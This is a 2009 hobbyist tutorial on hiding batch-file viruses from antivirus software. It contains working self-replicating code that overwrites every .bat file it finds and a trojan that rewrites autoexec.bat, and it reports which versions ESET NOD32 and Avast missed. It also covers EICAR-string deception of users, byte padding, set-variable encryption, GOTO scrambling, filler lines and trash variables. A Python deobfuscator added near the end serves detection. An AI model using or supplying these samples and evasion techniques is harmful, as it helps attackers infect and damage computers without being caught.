cOrRuPt G3n3t!x
July 2009
In order to make our batch file virus a little more inconspicuous, unreadable or undetectable, we use batch encryption techniques to fool AVs and people trying to read or decipher our code. There are many different ways, and today I'll explain all the ways I know for batch encryption and for fooling AVs and AV heuristics. I used ESET NOD32 Anti-Virus for its great heuristics capabilities and Avast4 Professional Edition for normal detection. Please remember all techniques have been tested on Windows Vista and work!
AV companies needed a way to test whether their product works on the user's computer without bringing harm to it, so EICAR was born: a universal string that will set off all AVs but will display 'EICAR TEST FILE NOT A VIRUS' or something similar. We therefore add this string to the beginning of our code in the hope that the user will let it run after seeing that it's a test file and not a virus. This will help when infecting people with limited knowledge of viruses, so it's definitely not a great technique compared to the others, but nonetheless, here's the string for the EICAR 'virus', which should be added to the beginning of your code:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
All AVs will only scan the first 1000 bytes of a batch file for any malicious code, so what do we do? We add a whole bunch of letters in the first 1000 bytes of our code. Pretty easy, and an excellent way to bypass scanners and in some cases AV heuristics. So here is exactly 1000 bytes of useless code which should be pasted at the beginning of your code:
As the acronym would suggest, this is a technique whereby the 'set' command in MS-DOS is used to encrypt the batch file and make it hard for the AV to analyze and for the user to interpret. We do this by assigning each command keyword to a variable with set; this might not make sense yet, but see below:
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
for %%a in (*.bat) do copy %0 %%a
Now, by encrypting the variables for, in, do and copy, it will become undetected. Although it was not detected after encrypting only one of the variables, this will not always be the case. This was not detected by ESET NOD32 or Avast4:
set a=for
set b=in
set c=do
set d=copy
%a% %%a %b% (*.bat) %c% %d% %0 %%a
This will be complicated for others to read, but not for people with a knowledge of batch, so what you could do is make the set encryption appear at the bottom of your code and then begin to read from the top. This works well with large code, as the user will have to scroll down to see the set encryption. You can do this simply by having a 'GOTO' command that goes to the decryption section before returning to the encrypted code; using more than one variable will make it much harder to read! See below:
@echo off
GOTO decrypt
:infect
%a% %%a %b% (*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
exit
:decrypt
set a=for
set b=in
set c=do
set d=copy
goto infect
First off, thanks to DvL for this idea, and now let's begin. This is just an awesome name I gave to an anti-AV technique that will help by hiding your lines and fool the AV from detecting the right tokens in your batch. All you need to do is add characters between each line of your code; it can also be numbers. I used the character 'n' as it was used in the legendary SASSER worm to cause a buffer overrun. The only snag is the virus has to have more than 3 or 4 lines to work effectively.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:
@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
When using the Character Overflow technique it was not detected by ESET NOD32:
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo off
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty nul
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst e: a:\ > c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst d: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst c: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty con
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
cls
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
This is a bit impractical, as it takes extremely long and is pretty confusing depending on the size of your code. It only works with code that is longer than 5 lines. What it does is confuse the AV by giving multiple goto commands, so the strings of the virus are separate and not read as a single token, so it won't be detected.
This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:
@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
Using the GOTO confuser it was not detected by ESET NOD32:
@echo off
goto a
:f
ctty nul
goto b
:l
@echo subst e: a:\ > c:\autoexec.bat
goto c
:m
@echo subst d: a:\ >> c:\autoexec.bat
goto d
:r
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
:a
goto f
:b
goto l
:c
goto m
:d
goto r
This refers to lines of code that simply do nothing, but as far as the AV is concerned it's working code, so what do we do with this in mind? We put meaningless garbage between our actual code. It is, however, important to make sure that the variable you use for trash code is not used for anything else:
This was detected as 'BAT/Silly.D Virus' by ESET NOD32:
for %%a in (*.bat) do copy %0 %%a
When using garbage or trash code it was not detected:
set trash=
%trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a
In the first line we made sure trash was set to nothing, then added it into the code of the virus; it worked perfectly without being detected!
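From the detection side, here is an added example (my own Python, not code from this tutorial) that undoes the set-variable, GOTO-reorder, filler-line and trash-variable tricks described above by tracing the script in execution order, so every variant reduces to the same statement a signature can match. SIGNATURE and SAMPLE are constructed here for the demonstration.

```python
import re

# Signature to match once the obfuscation is peeled off (the copy loop quoted above).
SIGNATURE = "for %%a in (*.bat) do copy %0 %%a"

# Constructed sample (not the tutorial's text verbatim): the SET-encrypted,
# GOTO-reordered variant with 'n' filler lines and an empty %trash% variable.
SAMPLE = """nnnnnnnnnnnnnnnnnnnnnnnn
@echo off
GOTO decrypt
:infect
set trash=
%trash% %a% %%a %b% (*.bat) %c% %d% %0 %%a
nnnnnnnnnnnnnnnnnnnnnnnn
exit
:decrypt
set a=for
set b=in
set c=do
set d=copy
goto infect
"""

def trace_batch(text, max_steps=10000):
    """Walk the script in execution order (following goto/labels), expand %var%
    from the set lines seen so far, drop labels and filler; return what runs."""
    lines = [ln.strip() for ln in text.splitlines()]
    labels = {ln[1:].lower(): i for i, ln in enumerate(lines) if ln.startswith(":")}
    env, out, pc, steps = {}, [], 0, 0
    while pc < len(lines) and steps < max_steps:    # step cap guards goto loops
        ln, pc, steps = lines[pc], pc + 1, steps + 1
        # cmd.exe expands %name% before it parses the command, case-insensitively
        ln = re.sub(r"%([A-Za-z_]\w*)%",
                    lambda m: env.get(m.group(1).lower(), m.group(0)), ln)
        ln = re.sub(r"\s+", " ", ln).strip()
        if not ln or ln.startswith(":") or len(set(ln)) == 1:
            continue                                # blank, label or 'nnnn' padding
        m = re.match(r"set\s+([A-Za-z_]\w*)=(.*)$", ln, re.I)
        if m:
            env[m.group(1).lower()] = m.group(2)
            continue
        m = re.match(r"goto\s+(\S+)$", ln, re.I)
        if m:
            pc = labels.get(m.group(1).lower(), len(lines))  # unknown label: stop
            continue
        if ln.lower() == "exit":
            break
        out.append(ln)
    return out
```

A scanner would check `SIGNATURE in trace_batch(script)`; the same pass also collapses the trash-variable form on its own.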
That's all I have for now; I hope it helps, and be sure to look out for my next tutorial on 'Polymorphism In Batch'. Remember this is for educational purposes only ;). If you'd like to contact me with any queries or problems, please e-mail me at immortalassassin@rocketmail.com.